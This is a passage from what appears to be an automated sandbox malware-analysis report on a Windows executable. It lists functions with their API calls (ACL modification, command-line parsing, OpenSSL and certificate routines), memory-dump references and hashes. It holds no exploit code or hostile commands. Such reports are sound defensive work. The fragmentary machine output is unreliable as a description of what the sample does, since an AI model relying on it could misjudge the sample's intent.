                                  • GetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,?,00000000,?,?,?,005C1AE6), ref: 005C70A4
                                  • SetEntriesInAclW.ADVAPI32(00000001,006D9844,?,005C1AE6,?,?,005C1AE6), ref: 005C70BC
                                  • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,005C1AE6,00000000,?,?,005C1AE6), ref: 005C70D1
                                  • LocalFree.KERNEL32(00000000), ref: 005C70EB
                                  • LocalFree.KERNEL32(00000000), ref: 005C70F6
                                  • LeaveCriticalSection.KERNEL32(006D9828), ref: 005C70FD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: InfoNamedSecurity$CriticalFreeLocalSection$EnterEntriesLeave
                                  • String ID:
                                  • API String ID: 1879718216-0
                                  • Opcode ID: 18ea22e5de88754dc0ae7dc3deebc6e485d8b46692078b98e6b867955cac298f
                                  • Instruction ID: 782d6b2602f957edba045e992edb08bdb8b7fefdf467d5829a357afc7556822b
                                  • Opcode Fuzzy Hash: 18ea22e5de88754dc0ae7dc3deebc6e485d8b46692078b98e6b867955cac298f
                                  • Instruction Fuzzy Hash: CF112931A41228BFDB215B929C49FDFBF7EEF46B51F004155F604B51A0C6B14A45EFA0
                                  Function 005CA7DB Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 166stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCommandLineW.KERNEL32(?,?,00000000), ref: 005CA7EA
                                  • lstrlenW.KERNEL32(00000000,?,?,00000000), ref: 005CA7F8
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • CommandLineToArgvW.SHELL32(?,00000000,?,?,00000000), ref: 005CA928
                                    • Part of subcall function 005C9F53: FindFirstFileW.KERNEL32(?,?), ref: 005C9F64
                                    • Part of subcall function 005C9F53: FindClose.KERNEL32(00000000), ref: 005C9F70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CommandFindLine$AllocateArgvCloseFileFirstHeaplstrlen
                                  • String ID: $3$7X\
                                  • API String ID: 2342302124-916873835
                                  • Opcode ID: 08332273e5e4067df62a85be383c3aef35a9949579369f297c389140ff11c6df
                                  • Instruction ID: ab8ba6851406fdb291385935c6032d7f6ecc7dca962a4e80870e05c6f1f5c5d1
                                  • Opcode Fuzzy Hash: 08332273e5e4067df62a85be383c3aef35a9949579369f297c389140ff11c6df
                                  • Instruction Fuzzy Hash: 9D51C630E0020E9FDF159BE4C45ABBEBFB5BF85308F15806DD442A7281EB749A45CB92
                                  Function 006573A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 166COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___from_strstr_to_strchr.LIBCMT ref: 0065741D
                                  • ___from_strstr_to_strchr.LIBCMT ref: 00657430
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ___from_strstr_to_strchr
                                  • String ID: characters$ to $..\..\openssl-1.1.0f\crypto\ui\ui_lib.c$You must type in
                                  • API String ID: 601868998-1592652383
                                  • Opcode ID: 26e9e776f043a15cc4a4b7f04fb2203f7c57dbf6f6119ac0e63918739553c5c1
                                  • Instruction ID: 7b7181ac3e229ab73f539dad711bdfa269c31c345c3532de7ddcf88a37bc0830
                                  • Opcode Fuzzy Hash: 26e9e776f043a15cc4a4b7f04fb2203f7c57dbf6f6119ac0e63918739553c5c1
                                  • Instruction Fuzzy Hash: 85517B313083426FD7149F29EC82F76BBE6FF98715F80015BF889C6282EB51E5548392
                                  Function 0067919C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleCP.KERNEL32(00000010,00000000,?,?,?,?,?,?,?,00679911,00000020,00000000,00000010,00000000,00000000,00000000), ref: 006791DE
                                  • __fassign.LIBCMT ref: 00679259
                                  • __fassign.LIBCMT ref: 00679274
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000010,00000005,00000000,00000000), ref: 0067929A
                                  • WriteFile.KERNEL32(?,00000010,00000000,00679911,00000000,?,?,?,?,?,?,?,?,?,00679911,00000020), ref: 006792B9
                                  • WriteFile.KERNEL32(?,00000020,00000001,00679911,00000000,?,?,?,?,?,?,?,?,?,00679911,00000020), ref: 006792F2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID:
                                  • API String ID: 1324828854-0
                                  • Opcode ID: 747067508774f70c316076784cd7c433d7a38bc295c1c8c818892413b2672794
                                  • Instruction ID: a48ef134b5e4590f97b0aaa649d65b92de4199b69e34d40dc13279a6efbf959c
                                  • Opcode Fuzzy Hash: 747067508774f70c316076784cd7c433d7a38bc295c1c8c818892413b2672794
                                  • Instruction Fuzzy Hash: 61519471A00249AFDF10CFB8DC85AEEBBFAEF09310F14815AE959E7291D7309951CB64
                                  Function 0067D241 Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f01aadfa526a978275bd462a2947a34f9965b465171147b54deac38dc76dbc6a
                                  • Instruction ID: c36ef7b3d842d635d1e7f6949e6f4474ad27c60d0db68025119a5e94d3f89056
                                  • Opcode Fuzzy Hash: f01aadfa526a978275bd462a2947a34f9965b465171147b54deac38dc76dbc6a
                                  • Instruction Fuzzy Hash: FB416171A00119ABDF208FA5CD84DEEBBBAEF49750B048619F918E6255DB31DD41CBA0
                                  Function 00667030 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                  Download Yara Rule
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00667067
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0066706F
                                  • _ValidateLocalCookies.LIBCMT ref: 006670F8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00667123
                                  • _ValidateLocalCookies.LIBCMT ref: 00667178
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 9adb1006c00f387ea14ae30326c416467adc4fd23812089bd7d8ed2a410eefb8
                                  • Instruction ID: 489475ff2f914adf7a05a6ba06dd92f78cd462faaf746f0d9c5b058ebf99a4f6
                                  • Opcode Fuzzy Hash: 9adb1006c00f387ea14ae30326c416467adc4fd23812089bd7d8ed2a410eefb8
                                  • Instruction Fuzzy Hash: BE41A334A04208ABCF10DF68C880AEEBBB7AF4531CF14815AF8145B356DB71AA15CBA0
                                  Function 005F0C20 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CertGetCertificateContextProperty.CRYPT32(005F0451,00000002,00000000,00000000), ref: 005F0C44
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CertCertificateContextProperty
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x
                                  • API String ID: 665277682-3443155802
                                  • Opcode ID: a78d4a5bd3f94a17679df95f65bfdf12f2dbc9affdf800b3ffa4d4f6f0880388
                                  • Instruction ID: 3f64607b7ed0e48341260bb3440701757eea2d3fa3502d1b2c087c18f771c911
                                  • Opcode Fuzzy Hash: a78d4a5bd3f94a17679df95f65bfdf12f2dbc9affdf800b3ffa4d4f6f0880388
                                  • Instruction Fuzzy Hash: 9531D971B403426BD650BB68CC0BF6F779DBBD0B54F81042BF905DA2D2EA64D94487A1
                                  Function 0067E903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1fe76f646c19f4475d7ad79be2ba624afc71cdd030802587156bec49b257204c
                                  • Instruction ID: 0860b95a05eeecce7d4d59b89bc12a5b7b2d5ad74dda7d74b8405fbb44eea129
                                  • Opcode Fuzzy Hash: 1fe76f646c19f4475d7ad79be2ba624afc71cdd030802587156bec49b257204c
                                  • Instruction Fuzzy Hash: 0E11D677605114BBCB612F768C0996B3B9FEF86770B1086A9F91ED7351EA32880587A0
                                  Function 006770AA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0067706E: _free.LIBCMT ref: 00677097
                                  • _free.LIBCMT ref: 006770F8
                                    • Part of subcall function 00675155: HeapFree.KERNEL32(00000000,00000000,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80), ref: 0067516B
                                    • Part of subcall function 00675155: GetLastError.KERNEL32(00674E80,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80,00674E80), ref: 0067517D
                                  • _free.LIBCMT ref: 00677103
                                  • _free.LIBCMT ref: 0067710E
                                  • _free.LIBCMT ref: 00677162
                                  • _free.LIBCMT ref: 0067716D
                                  • _free.LIBCMT ref: 00677178
                                  • _free.LIBCMT ref: 00677183
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 0da10c2576be13054457c106551b7933eac12509d5c0af9601a0bb33ada9bfab
                                  • Instruction ID: 8fc1650e7efb29f1d655ef8979bb692c8bb94a4c7e51e392ef2e36aa9db2f387
                                  • Opcode Fuzzy Hash: 0da10c2576be13054457c106551b7933eac12509d5c0af9601a0bb33ada9bfab
                                  • Instruction Fuzzy Hash: FC1133B1544B04BAD6B0BBB0CC17FCF779E6F04700F90881DB29EA6252EAB6B6844755
                                  Function 005EC220 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 246COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(..\..\openssl-1.1.0f\crypto\bio\bss_file.c,00000124), ref: 005EC397
                                  • GetLastError.KERNEL32(..\..\openssl-1.1.0f\crypto\bio\bss_file.c,00000140), ref: 005EC45E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ErrorLast
                                  • String ID: ','$..\..\openssl-1.1.0f\crypto\bio\bss_file.c$fflush()$fopen('
                                  • API String ID: 1452528299-2674688776
                                  • Opcode ID: 1c6183d116d84278ff6624ebfb1eb6c6407bc9b04b3eb491a8975879b832b700
                                  • Instruction ID: 96c967baad803679eb100a73b6b81ac25fb0a60d55f43d1d7cebac6337fedd9e
                                  • Opcode Fuzzy Hash: 1c6183d116d84278ff6624ebfb1eb6c6407bc9b04b3eb491a8975879b832b700
                                  • Instruction Fuzzy Hash: EB615CB374035567DA105ADDBC03FA9BB49FB88B26F014677FB84E62C1D762D90243A1
                                  Function 0067B603 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00675DB4,00000000,?,?,?,0067B854,?,?,00000100), ref: 0067B65D
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0067B854,?,?,00000100,5EFC4D8B,?,?), ref: 0067B6E3
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0067B7DD
                                  • __freea.LIBCMT ref: 0067B7EA
                                    • Part of subcall function 0067718E: RtlAllocateHeap.NTDLL(00000000,?,00000000,006815F0,005DBB23,00000188,?,00000000,005D6E99,00000188,..\..\openssl-1.1.0f\crypto\err\err.c,0000028F,006D9048), ref: 006771C0
                                  • __freea.LIBCMT ref: 0067B7F3
                                  • __freea.LIBCMT ref: 0067B818
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                  • String ID:
                                  • API String ID: 1414292761-0
                                  • Opcode ID: 47198f63ba4d242b45e807834c91358045af294eedc9d534d5af300ff8f1f86c
                                  • Instruction ID: d87a3c5affeffc733cc47c8672b120f1eafa3a1b3315525a78b2fb166a7640f8
                                  • Opcode Fuzzy Hash: 47198f63ba4d242b45e807834c91358045af294eedc9d534d5af300ff8f1f86c
                                  • Instruction Fuzzy Hash: 4D51B172600216AFDB298E64CC81FFB77ABEF84750F159629FD08D6240DB34DC518B94
                                  Function 0067D275 Relevance: 9.2, APIs: 6, Instructions: 180COMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0067D370
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 626452242-0
                                  • Opcode ID: eabbbd144f2f63f018c1cae75d09c15a4fa601facf975e9fcc1eadcccabde6b2
                                  • Instruction ID: 74f61b66bd4584bd08ef04554276ef7cbd64c0f89cbe51d500085a5ea22a0dfc
                                  • Opcode Fuzzy Hash: eabbbd144f2f63f018c1cae75d09c15a4fa601facf975e9fcc1eadcccabde6b2
                                  • Instruction Fuzzy Hash: 2051EA72A00116AADF248F64CC41DEE77F7EF48310B14CA29E90DE6295DB34DC45C760
                                  Function 005F0270 Relevance: 9.1, APIs: 6, Instructions: 130encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F02C4
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 005F02E8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000), ref: 005F02FF
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,?,00000000), ref: 005F0323
                                    • Part of subcall function 005F0490: CryptAcquireContextW.ADVAPI32(00000004,?,?,?,?), ref: 005F05A0
                                    • Part of subcall function 005F0490: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 005F05D4
                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 005F0388
                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 005F0391
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$CertContext$AcquireCertificateCloseCryptErrorFreeLastStore
                                  • String ID:
                                  • API String ID: 3186997219-0
                                  • Opcode ID: 5406aeae159b44255f2604404bab8e7c1194208731042a98d45597296d5a86b1
                                  • Instruction ID: 074604ada13eca593c04a61662aab7019c3eceaa5abd9207cc767886b6a74d3b
                                  • Opcode Fuzzy Hash: 5406aeae159b44255f2604404bab8e7c1194208731042a98d45597296d5a86b1
                                  • Instruction Fuzzy Hash: 0141293570020DBBDF206F988C42FBEBBAAEF44320F140629FF189A2D1DB7599548791
                                  Function 00668061 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00668058,006672CF,005D2705), ref: 0066806F
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0066807D
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00668096
                                  • SetLastError.KERNEL32(00000000,00668058,006672CF,005D2705), ref: 006680E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: 5624e2cd6938f38b38c48a75bf6f8190fb3b089ae93450eddaacfb0e609d12f1
